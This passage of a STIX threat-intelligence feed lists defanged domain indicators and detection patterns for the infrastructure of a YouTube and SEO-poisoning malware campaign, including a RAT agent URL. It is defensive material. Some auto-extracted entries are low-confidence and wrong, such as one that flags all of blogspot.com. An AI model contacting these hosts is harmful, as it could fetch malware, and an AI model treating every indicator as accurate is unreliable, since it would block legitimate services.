News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--51831f80-48fa-448b-a9d1-f71930b510c5","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"domain: amazingshield.xyz","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: a.js Stage-three Node.js Insomnia RAT agent URL hxxp[:]//aa.amazingshield[.]xyz/33244556546.py Stage-three Python Insomnia RAT agent URL","pattern":"[domain-name:value = 'amazingshield.xyz']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--6cb56d25-0669-46e6-8f3a-97c79a575cbb","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"domain: amountfuel.icu","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: reementjuice[.]space ; airplaneiron[.]xyz ; airtwig[.]xyz ; amountfuel[.]icu ; animalrecord[.]xyz ; apparatustruck[.]xyz CL-CRI-1171 g","pattern":"[domain-name:value = 'amountfuel.icu']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--6edad5b3-22f6-4ed8-a9ed-ae04dbef3cfa","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"domain: animalrecord.xyz","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: e ; airplaneiron[.]xyz ; airtwig[.]xyz ; amountfuel[.]icu ; animalrecord[.]xyz ; apparatustruck[.]xyz CL-CRI-1171 gate and landing infra","pattern":"[domain-name:value = 'animalrecord.xyz']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--7a7aa8f3-6227-423d-8ed8-83d90d84d565","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"domain: animalview.xyz","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: o OfferLoader payload handoff and second-stage hosts Domain animalview[.]xyz ; trickflag[.]info ; suitstraw[.]info ; connect.fuelleg[.","pattern":"[domain-name:value = 'animalview.xyz']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--8b8c1014-958b-4d2f-97df-33e7add73508","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"domain: apparatustaste.xyz","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: infrastructure Domain connect.activitykitty[.]xyz ; connect.apparatustaste[.]xyz ; connect.armcard[.]xyz ; connect.badgeterritory[.]xyz ;","pattern":"[domain-name:value = 'apparatustaste.xyz']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--7ef1c921-25a0-4fd6-8fa1-944e59980191","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"domain: apparatustruck.xyz","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: z ; airtwig[.]xyz ; amountfuel[.]icu ; animalrecord[.]xyz ; apparatustruck[.]xyz CL-CRI-1171 gate and landing infrastructure Domain appare","pattern":"[domain-name:value = 'apparatustruck.xyz']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--840a0185-2944-4a92-90ee-d2777598db71","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"domain: apparelplate.space","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: ck[.]xyz CL-CRI-1171 gate and landing infrastructure Domain apparelplate[.]space ; archairport[.]xyz ; authoritykittens[.]info ; babyvein[","pattern":"[domain-name:value = 'apparelplate.space']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--90f21d29-6c5a-4bbc-9b7b-9b1c298e7c2b","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"domain: archairport.xyz","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: te and landing infrastructure Domain apparelplate[.]space ; archairport[.]xyz ; authoritykittens[.]info ; babyvein[.]xyz ; badgewing[.]","pattern":"[domain-name:value = 'archairport.xyz']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--85063a8f-66c6-47c3-abd1-3f9f393a1e8f","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"domain: armcard.xyz","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: ctivitykitty[.]xyz ; connect.apparatustaste[.]xyz ; connect.armcard[.]xyz ; connect.badgeterritory[.]xyz ; connect.baitmetal[.]xyz","pattern":"[domain-name:value = 'armcard.xyz']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--3f78f354-65a9-438d-b2b0-59f3350b907b","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"domain: atthelake.info","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: allback, and script infrastructure Domain noiseship[.]cfd ; atthelake[.]info ; uy.basesfiles[.]com ; basesfile[.]com ; igk.filexspace[","pattern":"[domain-name:value = 'atthelake.info']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--909b5ab6-96ae-4d5e-9332-39543405c790","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"domain: authoritykittens.info","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: structure Domain apparelplate[.]space ; archairport[.]xyz ; authoritykittens[.]info ; babyvein[.]xyz ; badgewing[.]xyz ; bagcare[.]space ; ba","pattern":"[domain-name:value = 'authoritykittens.info']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--cf4079a0-90cd-43cd-a6ae-ae2ed87f4305","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"domain: babyvein.xyz","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: ate[.]space ; archairport[.]xyz ; authoritykittens[.]info ; babyvein[.]xyz ; badgewing[.]xyz ; bagcare[.]space ; basinpleasure[.]xyz","pattern":"[domain-name:value = 'babyvein.xyz']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--9208b534-a053-4b41-a533-f7a627b5286d","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"domain: badgeterritory.xyz","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: nect.apparatustaste[.]xyz ; connect.armcard[.]xyz ; connect.badgeterritory[.]xyz ; connect.baitmetal[.]xyz ; connect.beefteeth[.]xyz ; con","pattern":"[domain-name:value = 'badgeterritory.xyz']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--bfd7700b-7cb2-45ba-b862-31e40e716945","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"domain: badgewing.xyz","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: hairport[.]xyz ; authoritykittens[.]info ; babyvein[.]xyz ; badgewing[.]xyz ; bagcare[.]space ; basinpleasure[.]xyz ; basketballyear[","pattern":"[domain-name:value = 'badgewing.xyz']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--1d3f531f-bb2e-4fb2-93f3-fe0f6ecee43d","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"domain: bagcare.space","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: uthoritykittens[.]info ; babyvein[.]xyz ; badgewing[.]xyz ; bagcare[.]space ; basinpleasure[.]xyz ; basketballyear[.]xyz ; baskethumo","pattern":"[domain-name:value = 'bagcare.space']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--12054085-2db7-484a-ae4c-86614ee413e9","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"domain: baitmetal.xyz","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: nect.armcard[.]xyz ; connect.badgeterritory[.]xyz ; connect.baitmetal[.]xyz ; connect.beefteeth[.]xyz ; connect.believesisters[.]xyz","pattern":"[domain-name:value = 'baitmetal.xyz']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--8604bf22-8ee4-4a1e-a098-8234cf609ffc","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"domain: basesfile.com","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: noiseship[.]cfd ; atthelake[.]info ; uy.basesfiles[.]com ; basesfile[.]com ; igk.filexspace[.]com ; ikx.filexspace[.]com ; filexstor","pattern":"[domain-name:value = 'basesfile.com']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--263dfbd2-6f08-4679-9d1c-bd69d96129d3","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"domain: basesfiles.com","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: frastructure Domain noiseship[.]cfd ; atthelake[.]info ; uy.basesfiles[.]com ; basesfile[.]com ; igk.filexspace[.]com ; ikx.filexspace","pattern":"[domain-name:value = 'basesfiles.com']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--814733ba-3e73-4401-9f8b-5fb174d86fe1","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"domain: basinpleasure.xyz","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: info ; babyvein[.]xyz ; badgewing[.]xyz ; bagcare[.]space ; basinpleasure[.]xyz ; basketballyear[.]xyz ; baskethumor[.]xyz ; bedroomdesir","pattern":"[domain-name:value = 'basinpleasure.xyz']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--dc7aff58-f203-4ce5-bb50-9cd9f10b0ff8","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"domain: basketballyear.xyz","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: ; badgewing[.]xyz ; bagcare[.]space ; basinpleasure[.]xyz ; basketballyear[.]xyz ; baskethumor[.]xyz ; bedroomdesire[.]xyz ; beliefpicture","pattern":"[domain-name:value = 'basketballyear.xyz']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--8e03242b-9dce-41dd-8ba0-21e4098e4931","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"domain: baskethumor.xyz","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: care[.]space ; basinpleasure[.]xyz ; basketballyear[.]xyz ; baskethumor[.]xyz ; bedroomdesire[.]xyz ; beliefpicture[.]xyz ; bellplaygro","pattern":"[domain-name:value = 'baskethumor.xyz']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--a26e79f4-f729-46fb-84d1-858aa469d3ff","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"domain: bedroomdesire.xyz","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: pleasure[.]xyz ; basketballyear[.]xyz ; baskethumor[.]xyz ; bedroomdesire[.]xyz ; beliefpicture[.]xyz ; bellplayground[.]xyz ; bikesdonke","pattern":"[domain-name:value = 'bedroomdesire.xyz']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--3219d065-d50b-4bdf-bde5-20b3dc2a7b57","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"domain: beefteeth.xyz","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: ct.badgeterritory[.]xyz ; connect.baitmetal[.]xyz ; connect.beefteeth[.]xyz ; connect.believesisters[.]xyz ; connect.boundaryfly[.]xy","pattern":"[domain-name:value = 'beefteeth.xyz']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--7d149b8d-63d8-4d41-b58b-f6c85bef6f3d","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"domain: beliefpicture.xyz","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: tballyear[.]xyz ; baskethumor[.]xyz ; bedroomdesire[.]xyz ; beliefpicture[.]xyz ; bellplayground[.]xyz ; bikesdonkey[.]info ; birthdaymag","pattern":"[domain-name:value = 'beliefpicture.xyz']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--7a5ec759-0d69-4847-bba7-9bc95229b7a8","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"domain: believesisters.xyz","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: connect.baitmetal[.]xyz ; connect.beefteeth[.]xyz ; connect.believesisters[.]xyz ; connect.boundaryfly[.]xyz ; connect.bubbleappliance[.]x","pattern":"[domain-name:value = 'believesisters.xyz']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--e27deab7-74ac-427d-b1a8-0bd9d45f08b9","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"domain: bellplayground.xyz","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: ethumor[.]xyz ; bedroomdesire[.]xyz ; beliefpicture[.]xyz ; bellplayground[.]xyz ; bikesdonkey[.]info ; birthdaymagic[.]xyz ; boatthought[","pattern":"[domain-name:value = 'bellplayground.xyz']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--4b77332e-5812-4e67-9ca8-9797806a1654","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"domain: bikesdonkey.info","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: desire[.]xyz ; beliefpicture[.]xyz ; bellplayground[.]xyz ; bikesdonkey[.]info ; birthdaymagic[.]xyz ; boatthought[.]xyz ; boundarychick","pattern":"[domain-name:value = 'bikesdonkey.info']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--cc03a89f-3b43-467c-958f-60f5d5e3e8c1","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"domain: birthdaymagic.xyz","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: picture[.]xyz ; bellplayground[.]xyz ; bikesdonkey[.]info ; birthdaymagic[.]xyz ; boatthought[.]xyz ; boundarychickens[.]xyz ; boytank[.]","pattern":"[domain-name:value = 'birthdaymagic.xyz']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--43c21b7e-dbbd-4a48-803d-d258474e10d9","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"domain: blogspot.com","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: ferLoader installation-tracker infrastructure Domain velfps.blogspot[.]com ; velvoxlab.blogspot[.]com ; venrx.blogspot[.]com ; venrx","pattern":"[domain-name:value = 'blogspot.com']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--e6ac17ec-8781-4e93-9d7b-73f6239ce372","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"domain: boardmagic.info","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: vesselsystem[.]xyz ; minewave[.]info ; collartitle[.]info ; boardmagic[.]info ; placespoon[.]xyz ; needcherries[.]online OfferLoader in","pattern":"[domain-name:value = 'boardmagic.info']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--9eff9a4e-bbe5-4927-b27c-8a1696f07f25","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"domain: boatthought.xyz","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: ayground[.]xyz ; bikesdonkey[.]info ; birthdaymagic[.]xyz ; boatthought[.]xyz ; boundarychickens[.]xyz ; boytank[.]xyz ; branchmorning[","pattern":"[domain-name:value = 'boatthought.xyz']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--80cd8f81-4478-431d-b634-f5386e0a9ab5","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"domain: boundarychickens.xyz","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: esdonkey[.]info ; birthdaymagic[.]xyz ; boatthought[.]xyz ; boundarychickens[.]xyz ; boytank[.]xyz ; branchmorning[.]xyz ; breathdoctor[.]xy","pattern":"[domain-name:value = 'boundarychickens.xyz']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--d69626d6-7d08-435f-8374-59625c8f665d","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"domain: boundaryfly.xyz","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: ct.beefteeth[.]xyz ; connect.believesisters[.]xyz ; connect.boundaryfly[.]xyz ; connect.bubbleappliance[.]xyz ; connect.cableland[.]xyz","pattern":"[domain-name:value = 'boundaryfly.xyz']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--1f4f00da-9f10-4e75-8df3-70ed2e2f37a9","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"domain: boytank.xyz","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: ymagic[.]xyz ; boatthought[.]xyz ; boundarychickens[.]xyz ; boytank[.]xyz ; branchmorning[.]xyz ; breathdoctor[.]xyz ; bubbleslip[.","pattern":"[domain-name:value = 'boytank.xyz']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--d65a5974-c5f0-472d-81d3-4c8804690b48","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"domain: branchmorning.xyz","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: oatthought[.]xyz ; boundarychickens[.]xyz ; boytank[.]xyz ; branchmorning[.]xyz ; breathdoctor[.]xyz ; bubbleslip[.]xyz ; 